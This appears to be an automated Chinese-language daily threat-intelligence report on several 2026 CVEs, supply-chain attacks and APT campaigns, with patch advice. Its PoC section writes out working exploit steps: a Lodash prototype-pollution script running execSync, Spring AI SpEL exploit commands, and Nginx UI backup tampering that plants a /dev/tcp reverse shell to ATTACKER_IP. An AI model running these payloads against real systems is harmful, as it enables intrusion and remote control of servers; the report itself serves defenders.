每日安全情报报告 · 2026-04-04

每日安全情报报告 · 2026-04-04

报告时间 :2026-04-04 18:00 CST
覆盖范围 :近 48 小时新增高危漏洞、PoC 公开情报及安全态势要点
风险等级说明:🔴 严重(CVSS ≥ 9.0)|🟠 高危(CVSS 7.0--8.9)|🟡 中危(CVSS 4.0--6.9)


一、高危漏洞速报

🔴 CVE-2026-28766 --- Gardyn 云端 API 未授权信息泄露

字段 详情
漏洞类型 缺失认证(CWE-306)
受影响组件 Gardyn Cloud API /api/users 端点(固件 < master.622)
CVSS 3.1 评分 9.3(严重)
披露日期 2026-04-03
在野利用 暂无确认,但端点完全公开

漏洞描述 :Gardyn 云端 API 的 /api/users 端点无需任何认证即可返回全量用户账户信息,共暴露 134,215 名注册用户的完整账户数据(邮箱、设备绑定信息、家庭地址等)。攻击者发送单次 HTTP GET 请求即可批量获取。

修复建议 :立即将 Gardyn 家庭套件与 Studio 设备固件升级至 master.622 或更高版本,并更新移动端 App。

参考链接


🔴 CVE-2026-22738 --- Spring AI SimpleVectorStore SpEL 注入 RCE

字段 详情
漏洞类型 SpEL 表达式注入(CWE-917)→ 远程代码执行
受影响组件 Spring AI Core 1.0.0--1.0.4、1.1.0-M1--1.1.3
CVSS 3.1 评分 9.0(严重)
披露日期 2026-03-27
PoC 状态 ✅ 已公开(1 天前更新)

漏洞描述 :Spring AI 的 SimpleVectorStore 组件在处理用户提供的过滤表达式键名时,未经安全校验直接传入 Spring Expression Language(SpEL)引擎求值。攻击者可构造包含任意 Java 代码的键名,通过 T(java.lang.Runtime).getRuntime().exec(...) 等方式在服务端实现未认证远程代码执行。

修复建议 :升级至 Spring AI Core 1.0.5 / 1.1.4 或更高版本;临时缓解措施为对过滤键名进行严格白名单校验。

参考链接


🔴 CVE-2026-33026 --- Nginx UI 备份恢复加密设计缺陷 RCE

字段 详情
漏洞类型 加密设计缺陷(CWE-347)→ 任意配置篡改 → RCE
受影响组件 Nginx UI < 2.3.4
CVSS 3.1 评分 9.1(严重) / CVSS v4.0: 9.4
披露日期 2026-03-30
PoC 状态 ✅ 已公开(2 天前更新)

漏洞描述 :Nginx UI 备份恢复机制存在"循环信任"设计缺陷:系统将 AES 加密密钥和 IV 直接作为"安全令牌"下发给客户端。持有备份文件的攻击者可解密、篡改 app.ini 配置(注入反弹 Shell 命令),重新加密后上传,恢复时触发 RCE。

修复建议 :立即升级至 Nginx UI v2.3.4 (引入服务器端签名清单 manifest.sig,切断循环信任);无法升级时严格限制管理界面网络访问。

参考链接


🟠 CVE-2026-4800 --- Lodash _.template 代码注入 RCE

字段 详情
漏洞类型 代码注入(CWE-94),CVE-2021-23337 补丁绕过
受影响组件 Lodash 4.0.0--4.17.21(npm 生态,周下载量数亿次)
CVSS 3.1 评分 8.1(高危)
披露日期 2026-04-02
PoC 状态 ✅ 已公开(3 天前)

漏洞描述 :Lodash _.template 函数对 imports 对象键名的清理逻辑存在 ES6 默认参数语法绕过。攻击者若能控制传入 _.templateimports 对象键名(或通过原型污染链预先污染 Object.prototype.imports),可注入任意 JavaScript 代码并在 Node.js 服务端执行。该漏洞是对 2021 年老补丁的绕过,影响全球数百万 npm 依赖项目。

修复建议 :立即升级至 Lodash 4.18.0 或更高版本;临时缓解可使用 Object.freeze(Object.prototype) 阻断原型污染链。

参考链接


🔴 CVE-2026-4747 --- FreeBSD 内核远程代码执行(AI 辅助发现)

字段 详情
漏洞类型 内核级远程代码执行(RCE),提权至 root
受影响组件 FreeBSD(具体版本待 NVD 更新)
CVSS 评分 严重(Critical,具体分值待确认)
披露日期 2026-04-01
PoC 状态 ✅ 完整利用链已由 AI 自主生成
特殊标注 ⚠️ 首个由 AI 独立发现并编写完整利用代码的内核漏洞

漏洞描述:安全研究公司 Pixee 披露,AI 模型独立发现 FreeBSD 内核漏洞 CVE-2026-4747,并自主编写了完整的远程内核 RCE 利用链(含 root shell)。这标志着漏洞武器化周期从数周压缩至数小时。FreeBSD 官方已发布补丁。

修复建议:立即应用 FreeBSD 官方安全补丁;重新评估 AI 驱动漏洞利用背景下的补丁窗口期 SLA(建议缩短至 48 小时以内)。

参考链接


二、漏洞 PoC 情报

PoC 1 --- CVE-2026-22738:Spring AI SpEL 注入 RCE

漏洞背景 :Spring AI SimpleVectorStore 未过滤用户输入的过滤键名,直接传入 SpEL 执行环境,可实现未认证 RCE。

影响版本:Spring AI Core 1.0.0--1.0.4、1.1.0-M1--1.1.3

利用步骤

bash 复制代码
# Step 1:克隆 PoC 仓库
git clone https://github.com/n0n4m3x41/CVE-2026-22738-POC.git
cd CVE-2026-22738-POC

# Step 2:安装依赖
pip install requests

# Step 3(可选):使用 Docker 搭建靶机环境
docker-compose up -d

# Step 4:执行 PoC(攻击指定目标)
python3 exploit.py --target http://TARGET_IP:8080

# Step 5(等待靶机就绪时):
python3 exploit.py --target http://TARGET_IP:8080 --wait

PoC 验证流程

  1. 确认 /vectorstore/similarity 端点可访问,返回种子数据

  2. 通过 T(java.lang.System).getProperty("java.version") 确认 SpEL 注入点

  3. 执行系统命令,在目标容器内创建 /tmp/pwned_cve_2026_22738

  4. 读取 /tmp/rce_proof.txt 验证 RCE 成功

⚠️ 免责声明:仅用于授权安全测试和防御研究,请勿用于未授权系统。

参考链接PoC 仓库 - GitHub


PoC 2 --- CVE-2026-4800:Lodash _.template 原型污染链 RCE

漏洞背景 :Lodash _.template 对 ES6 默认参数语法校验不足,可通过原型污染注入任意代码实现 RCE。

影响版本:Lodash 4.0.0--4.17.21

利用步骤

bash 复制代码
# Step 1:克隆 PoC 仓库
git clone https://github.com/threalwinky/CVE-2026-4800-POC.git
cd CVE-2026-4800-POC

# Step 2:安装 lodash 依赖
npm install lodash

# Step 3:创建利用脚本 poc.js(原型污染链)
cat > poc.js << 'EOF'
const _ = require('lodash');

// 污染 Object.prototype.imports 注入恶意键名
Object.prototype.imports = {
  'x=process.getBuiltinModule("child_process").execSync("id > /tmp/rce_proof.txt")': undefined
};

// 触发 _.template 执行污染的 imports 键名
_.template('', {});
console.log("[*] Exploit triggered, check /tmp/rce_proof.txt");
EOF

# Step 4:执行利用脚本
node poc.js

# Step 5:验证 RCE 结果
cat /tmp/rce_proof.txt

替代向量(直接键名注入)

javascript 复制代码
// 若应用将用户输入直接作为 imports 键名传入
_.template('hello', {
  imports: {
    'x=require("child_process").execSync("whoami")': undefined
  }
});

⚠️ 免责声明:仅用于授权安全测试和防御研究,请勿用于未授权系统。

参考链接PoC 仓库 - GitHub | Lodash 安全公告


PoC 3 --- CVE-2026-33026:Nginx UI 备份篡改 RCE

漏洞背景:Nginx UI 将 AES 密钥下发给客户端,攻击者可解密/篡改备份配置并触发任意命令执行。

影响版本:Nginx UI < 2.3.4

利用步骤(概念验证流程)

bash 复制代码
# Step 1:获取备份文件和 AES 安全令牌
#(需登录 Nginx UI 管理界面,或拦截合法备份请求获取令牌)
# 下载 nginx-ui.zip 备份 + 记录响应中的 AES Key / IV

# Step 2:使用 AES Key/IV 解密备份文件
openssl enc -d -aes-256-cbc -K <HEX_KEY> -iv <HEX_IV> \
    -in nginx-ui.zip.enc -out nginx-ui.zip

# Step 3:解压并篡改配置
unzip nginx-ui.zip -d backup_dir
# 编辑 backup_dir/app/app.ini,在 [terminal] 节添加:
# StartCmd = bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

# Step 4:重新计算哈希并更新清单
sha256sum backup_dir/app/app.ini  # 计算新哈希
# 更新 hash_info.txt 中对应条目

# Step 5:重新加密并打包
zip -r nginx-ui-malicious.zip backup_dir/
openssl enc -e -aes-256-cbc -K <HEX_KEY> -iv <HEX_IV> \
    -in nginx-ui-malicious.zip -out nginx-ui-malicious.zip.enc

# Step 6:上传恶意备份至 Nginx UI 恢复界面,触发 RCE
# 攻击者提前在本机监听:
nc -lvnp 4444

⚠️ 免责声明:仅用于授权安全测试和防御研究,请勿用于未授权系统。

参考链接GitHub 安全公告 | CVEReports 完整分析


三、安全资讯精选

📰 1. 中国 APT 组织 TA416 重启欧洲政府网络间谍行动

来源 :The Hacker News / CyberNews
发布日期:2026-04-03 至 04-04

与中国有关的 APT 组织 TA416 (又称 DarkPeony、RedDelta)在沉寂近两年后,重新针对欧洲政府机构和外交实体发动网络间谍攻击。此轮攻击利用 Cloudflare Turnstile 验证页面 实施鱼叉钓鱼,结合 OAuth 重定向滥用C# 项目文件 传递 PlugX 恶意软件,目标覆盖欧盟及 NATO 成员国外交系统。

风险评估 :🔴 高
建议:加强外交机构邮件过滤,禁用非必要 OAuth 第三方授权,监控 PlugX 相关 IoC。

阅读 THN 原文 | CyberNews 分析


📰 2. 新型 SparkCat 变种在 App Store & Google Play 窃取加密钱包助记词

来源 :Kaspersky / The Hacker News
发布日期:2026-04-03

卡巴斯基威胁研究团队发现 SparkCat 木马 新变种,成功绕过苹果和谷歌应用商店审核。该恶意软件隐藏在企业通讯工具外卖服务 等看似正规的应用中,使用 OCR 模型 扫描用户相册,专门寻找包含加密货币钱包**恢复短语(助记词)**的截图,并将其外泄至攻击者服务器。iOS 版受感染面更广。

风险评估 :🟠 高(加密资产用户)
建议:避免将钱包助记词截图保存至相册;仅从可信渠道下载 App;卡巴斯基已更新检测规则。

Kaspersky 官方公告 | 阅读详情


📰 3. 朝鲜 UNC1069 社会工程攻击 Axios npm 包维护者,供应链遭入侵

来源 :The Hacker News
发布日期:2026-04-03

朝鲜关联威胁组织 UNC1069 伪装成合法公司创始人,通过高度定向社会工程攻击入侵 Axios npm 包维护者账号,在 1 亿周下载量的主流 npm 库中植入跨平台 RAT(远程访问木马),恶意版本号为 1.14.1 / 0.30.4。此为 2026 年继 Trivy 后第二起重大 npm 供应链攻击事件。

风险评估 :🔴 严重(Axios 依赖方)
建议 :立即检查 package-lock.json,确认 axios 版本非 1.14.1 / 0.30.4;使用 npm audit 扫描依赖树;企业 CI/CD 环境建议启用依赖版本锁定和签名验证。

阅读 THN 报道 | Pixee 供应链周报


来源 :The Hacker News
发布日期:2026-04-03

微软威胁情报团队发现攻击者滥用 HTTP Cookie 作为 Linux 服务器上 PHP WebShell 的隐蔽控制通道 。恶意 Shell 通过 PHP $_COOKIE 全局变量接收指令并执行,将 WebShell 通信流量伪装成普通 Cookie 请求,有效规避基于流量特征的安全检测。此技术显著提升了持久化后门的隐蔽性。

风险评估 :🟠 高
建议:部署 Web 应用防火墙(WAF)Cookie 内容检测规则;定期审计服务器 PHP 文件完整性;监控异常 Cookie 字段长度和内容。

阅读 THN 原文


📰 5. AI 加速漏洞武器化:从发现到 Exploit 仅需数小时

来源 :Pixee AppSec Weekly
发布日期:2026-04-01

本周 CVE-2026-4747(FreeBSD 内核 RCE)由 AI 模型独立发现并自主生成完整利用链的事件,标志着安全领域重大转折点。传统漏洞武器化需要数周的人工分析,现在可能被 AI 在数小时内完成。安全团队需重新审视补丁窗口期 SLA,将关键漏洞修复时限从"30天"压缩至"48小时以内",并优先处理公开评分前 10 的未修补严重漏洞。

风险评估 :🔴 行业整体威胁等级上升
建议:订阅自动漏洞情报推送;建立 AI 驱动漏洞监测机制;高风险系统优先部署自动补丁。

Pixee 完整周报


📰 6. 攻击组织 REF1695 通过 ISO 诱饵投放 RAT + 挖矿木马实施 CPA 欺诈

来源 :The Hacker News
发布日期:2026-04-02

攻击组织 REF1695 通过伪装成合法软件安装程序的 ISO 文件,同时投放远程访问木马(RAT)加密货币挖矿程序 ,并实施 CPA(每次操作付费)广告欺诈。该组织还部署了新型 .NET 植入程序 CNB Bot,形成多目标混合攻击链。

风险评估 :🟠 高
建议:禁止用户运行来源不明的 ISO 文件;使用 EDR 工具检测异常进程树;监控非法 CPU 占用高峰。

阅读 THN 原文


四、综合风险摘要

优先级 CVE / 事件 影响面 建议行动
🔴 P0 CVE-2026-22738 Spring AI SpEL RCE Spring AI 项目(AI/ML 后端) 立即升级至 1.0.5/1.1.4
🔴 P0 CVE-2026-33026 Nginx UI 备份 RCE Nginx UI < 2.3.4 管理员 立即升级至 v2.3.4
🔴 P0 CVE-2026-4747 FreeBSD 内核 RCE FreeBSD 服务器 立即应用官方内核补丁
🔴 P0 CVE-2026-28766 Gardyn API 信息泄露 Gardyn 家庭设备用户 立即升级固件至 master.622
🟠 P1 CVE-2026-4800 Lodash 代码注入 npm 生态大量 Node.js 项目 升级至 Lodash 4.18.0
🟠 P1 UNC1069 Axios 供应链投毒 使用 Axios 的 JS/TS 项目 检查版本,运行 npm audit
🟠 P1 SparkCat 变种(App Store/GP) iOS/Android 加密资产用户 勿截图保存助记词
🟠 P1 TA416 PlugX 欧洲政府间谍活动 欧洲政府/外交机构 监控 PlugX IoC,审查 OAuth

五、今日数据速览

  • 新增 CVE(过去 48 小时):约 312 条(高危及以上 28 条)
  • CISA KEV 新增:CVE-2026-33017(Langflow)联邦修复截止日期 4 月 14 日持续有效
  • 活跃 PoC 本周新增:6 个(Spring AI、Lodash、Nginx UI、FreeBSD、CVE-2026-28766、nginx-ui)
  • 供应链攻击事件:2 起(Axios npm、PyPI Telnyx 持续)

报告由自动化安全情报收集系统生成 | 数据来源:NVD、GitHub Security Advisories、TheHackerNews、Kaspersky、CVEReports、Pixee AppSec、CISA KEV

相关推荐
世界尽头与你16 小时前
Android Root 检测原理
android·安全·网络安全·渗透测试
kp0000016 小时前
如何平衡模型输出的“有用性”和“安全性
人工智能·安全·网络安全·信息安全·ai安全
世界尽头与你18 小时前
iOS 越狱检测原理
安全·网络安全·ios·信息安全·渗透测试
kp000001 天前
大模型输出造成信息泄露类型
人工智能·网络安全·信息安全·ai安全
kp000001 天前
System Prompt Leakage(系统提示词泄露)及安全防御
网络·安全·网络安全·信息安全·prompt·ai安全
X7x51 天前
攻防对抗的结构化思维:深度拆解网络杀伤链(Kill Chain)与现代防御演进
网络安全·网络攻击模型·安全架构·网络杀伤链·kill chain
kp000002 天前
AI大模型,如何区分善意提问与Prompt注入攻击
人工智能·网络安全·信息安全·prompt·ai安全
kp000002 天前
AI系统输入安全基线
人工智能·安全·网络安全·信息安全·ai安全
菩提小狗2 天前
每日安全情报报告 · 2026-07-19
网络安全·漏洞·cve·安全情报·每日安全
kp000002 天前
NER(Named Entity Recognition)命名实体识别
人工智能·网络安全·信息安全·ai安全